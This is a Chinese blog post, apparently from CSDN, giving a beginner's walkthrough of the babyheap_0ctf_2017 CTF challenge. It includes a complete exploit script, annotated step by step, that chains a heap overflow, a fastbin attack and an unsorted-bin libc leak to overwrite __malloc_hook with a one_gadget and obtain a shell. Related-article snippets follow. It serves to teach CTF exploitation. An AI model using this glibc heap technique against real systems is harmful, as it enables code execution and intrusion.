绝对详细的babyheap_0ctf_2017题解

最新推荐文章于 2024-01-10 03:24:25 发布
最新推荐文章于 2024-01-10 03:24:25 发布
阅读量994 收藏 5
点赞数 6
分类专栏: pwn 文章标签: 指针 python pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xieyichensss/article/details/116071092
版权

这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。
直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆)
from pwn_debug import *

pdbg = pwn_debug(‘babyheap_0ctf_2017’)
pdbg.remote(‘node3.buuoj.cn’,26076)
p = pdbg.run(‘remote’)

def allocate(size):
p.recvuntil('Command: ')
p.sendline(‘1’)
p.recvuntil('Size: ')
p.sendline(str(size))

def fill(idx,content):
p.recvuntil('Command: ')
p.sendline(‘2’)
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvuntil('Size: ')
p.sendline(str(len(content)))
p.recvuntil('Content: ')
p.send(content)

def free(idx):
p.recvuntil('Command: ')
p.sendline(‘3’)
p.recvuntil('Index: ')
p.sendline(str(idx))

def dump(idx):
p.recvuntil('Command: ')
p.sendline(‘4’)
p.recvuntil('Index: ')
p.sendline(str(idx))
p.recvline()
return p.recvline()

allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x10)
allocate(0x80)
free(1)
free(2)
这一段代码:申请五个堆块,下标从0到4,用户区大小为0x10,加上chunk head的0x10,共0x20大小。再先释放下标为1,然后释放下表为2。图
在这里插入图片描述此时allocate表下的,chunk1和chunk2已经是free掉了。
#gdb.attach§
这里注意以下大小,chunk0到chunk3是是0x21。因为标志位P位为1.
在这里插入图片描述

payload = p64(0) * 3
payload += p64(0x21)
payload += p64(0) * 3
payload += p64(0x21)
payload += p8(0x80) //注意这里是p(8),因为只需要改变最低位的一个字节为80就好啦,chunk0:0-0x1f chunk1:0x20-0x3f chunk2:0x40-0x5f chunk3:0x60-0x7f chunk4:0x80-0x100
fill(0,payload)
这段代码:是修改chunk2的user date区域,但是现在chunk2已经free了,所以user data区首地址变为了fd指针所指向的区域。图
在这里插入图片描述

#gdb.attach§
注:只能向不在free状态的chunk写入数据
payload = p64(0) * 3
payload += p64(0x21)
fill(3,payload)
这段代码:向chunk3写入数据,填充chunk4的size块为0x21。因为fastbin有一个原则:就是通过fd指针连接的一定是相同大小的嘞。看size的图
在这里插入图片描述

#gdb.attach§

allocate(0x10) //将chunk2 allocate回来,放入刚才chunk1所在的位置
allocate(0x10) //将chunk2的fd指针指向的chunk4 allocate回来,放在刚才chunk2所在的位置
也就是index2和index4的位置上都是chunk4
fill(1,‘aaaa’)
fill(2,‘bbbb’)
payload = p64(0) * 3
payload += p64(0x91)
fill(3,payload)
这段代码:将chunk4的size改为0x91。(至于为什么多余一个1,这是size的标志位的P位,P=1时,前一个chunk正在使用,这是为了防止chunk进行合并)
allocate(0x80) //进行这一步是为了free之前,chunk4与top chunk不连接。。。。。。。)
free(4) //将chunk4放入unsorted bin中
这段代码:
libc_base = u64(dump(2)[:8].strip().ljust(8, “\x00”))-0x3c4b78
log.info("libc_base: "+hex(libc_base)) //因为之前释放到unsorted bin中,就是如果 usortbin 只有一个 bin ,它的 fd 和 bk 指针会指向同一个地址(unsorted bin 链表的头部),这个地址为 main_arena + 0x58
在这里插入图片描述由此图和Pwngdb(就是Pwngdb)的magic命令发现发现malloc__hook和libc基地址的偏移为0x3c4b10
我们查看main_arena附近地址的数据,发现了malloc__hook
这里来说以下libc基地址的计算:dump(2)得到的是main_arena+0x58的地址,减去0x58得到main_arena地址(因为刚才查看了main_arena附近的地址,知道malloc__hook和main_arena偏移为0x10),再减0x10得到malloc__hook地址(我们用magic得到了malloc__hook和libc的偏移),最后减去malloc__hook和libc的偏移即为libc基地址!!!!!!

在这里插入图片描述

allocate(0x60)
free(4)
//将chunk4 allocate回来后放入fastbin
payload = p64(libc_base+0x3c4aed)
// 我们需要在allocate回来的chunk6(index4)后伪造一个fake chunk,然后需要的大小要在0x60-0x7f之间,我们找到的位置是0x0x7fa8994e6aed,然后要算出与libcbase的偏移是0x3c4aed。
fill(2, payload)

allocate(0x60) // chunk6
allocate(0x60) //chunk6所指向的fake chunk

payload = p8(0)*3
payload += p64(0)*2 进行内存对齐,因为找到的合适的大小的位置与malloc__hook的偏移为19,所以要对齐内存哦。
payload += p64(libc_base+0x4526a) //0x4526a是one_gadget的一个地址
fill(6, payload)

#gdb.attach§

allocate(255) //进行allocate之前需要检查malloc__hook函数的内容,如果为0,就跳过此步骤,如果不为0,就跳转到此部分执行。

p.interactive()

注:我一开始看wp的时候,有的根本不懂,后来知道是因为chunk和index的区别,我们一开始构造的函数都是以index为下标的。奉上一张图。(建议最后再看,这是malloc和free的过程,中间我跳了一些)
在这里插入图片描述

eeeeeeeeeeeeeeeea
关注
  • 6
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3737
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
搭建Ubuntu16.04系统下Pwn环境的几个疑难问题
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
04-10 7630
  之前搭建了一下 Ubuntu 系统下的 Pwn 环境,但是搭建过程中遇到很多问题,有些顺手可以解决。还有一部分花费了很长时间,在此记录。 1. 使用通用exp执行不能getshell   前情提要:   我本来是有一套 Kali 的做题环境的,执行 exp 什么的都正常,后来重新搭了一套 Ubuntu20.04 的环境。工具什么的都可以正常安装,但是发现之前能用的 exp 都执行不了了,执行起来会报错并且不能getshell了。   以攻防世界Pwn题目“level0”为例,EXP如下: from pw
babyheap_0ctf_2017 详细解析【BUUCTF】
qq_41696518的博客
09-06 2735
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 622
babyheap
babyheap_0ctf_2017
m0sway的博客
11-25 510
babyheap_0ctf_2017 使用checksec查看: 保护全开,看到PIE的时候就想到需要泄露libc_base_addr了 拉进IDA中看吧: 一个死循环,主要功能Allocate、Fill、Free、Dump,这边我已经修改函数名了,接下来一个一个看 首先是创建堆: 最多创建15个chunk、每个chunk的最大size是4096 *(0x18LL * i + a1) = 1;创建chunk时给了标志1 接着是编辑堆内容: 判断了标志存不存在,若chunk存在,让用户输入size存放
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
hac.zip_CTF信息隐写_ctf
09-23
CTF信息隐写,非常简单的入门小实验,带你走进CTF
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
Angr_Tutorial_For_CTF:ctf的angr教程
04-30
Angr_Tutorial_For_CTF angr是一个非常有用的二进制分析框架。 许多ctfer喜欢使用angr节省他们在CTF中的时间。 但是,对于初学者来说,angr有点困难,因为它从版本7更新到了版本8。而且许多CTF中有关angr的出色教程...
0ctf Babyheap 2017
Bill
03-11 6359
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
babyheap_0_ctf_2017
m0_48127441的博客
04-01 192
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
[BUUCTF]-PWN:babyheap_0ctf_2017解析
最新发布
2301_79326813的博客
01-10 962
但是这里要解释一点,为什么不能直接释放堆块4,虽然这样堆块4也能进入unsortedbin里,但是要注意free堆块后指向堆块的指针将会被置零,大致意思就是free了之后,index4就不指向那个堆块了,这时候dump(4)就是无效的,虽然那个堆块里面有mainarena+88的地址,但dump(4)不会打印出里面的地址,所以我们要让两个堆块的指针指向同一个堆块,这样在释放掉一个堆块时还能用另一个指针利用该堆块。后面alloc(0x60)与这里的0x7f有关。
0ctf_2017_babyheap
z1r0的博客
12-23 914
0ctf_2017_babyheap 查看保护 edit可以改size,堆溢出,overlapping泄露libc。fastbin attack改hook为onegadget即可getshell。overlapping和fastbin的攻击手法具体看z1r0’s blog from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug:
【FastBinAttack实战】babyheap_0ctf_2017
Tokameine的博客
08-09 493
分析利用: 无壳,IDA打开后可以看出题目是基本的增删与展示(函数名为方便阅读而修改) __int64 __fastcall main(__int64 a1, char **a2, char **a3) { char *v4; // [rsp+8h] [rbp-8h] v4 = initMmapList(); while ( 1 ) { Menu(); switch ( getInput() ) { case 1LL: ...
babyheap_0ctf_2017 ——堆入门
wuyvle的博客
02-13 378
主要思路: fastbin attack unsortedbin attack 泄露libc地址 malloc_hook劫持程序流 这个函数有4个功能 Allocate:分配内存大小并给出 index Fill:输入 index ,并分配内存进行内容写入操作 Free:输入 index ,释放相应的内存空间 Dump:输入 index ,打印内容 分配的大小不能超过 4096 字节 *(24LL * i + a1):置 1 表示 chunk 已经创建 *(a1 + 24LL * i + 8):存储 c
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 206
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
buuctf babyheap_0ctf_2017
carol2358的博客
05-06 847
主体函数 我们可以在fill里发现可以任意输入字节 接下来我们就用chunk extend和off by one 图片来自 https://bbs.pediy.com/thread-246786.htm 具体看exp exp: from pwn import * #p=process('./babyheap_0ctf_2017') e=ELF('/lib/x86_64-linux-gn...
x_ctf_b0verfl0w
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值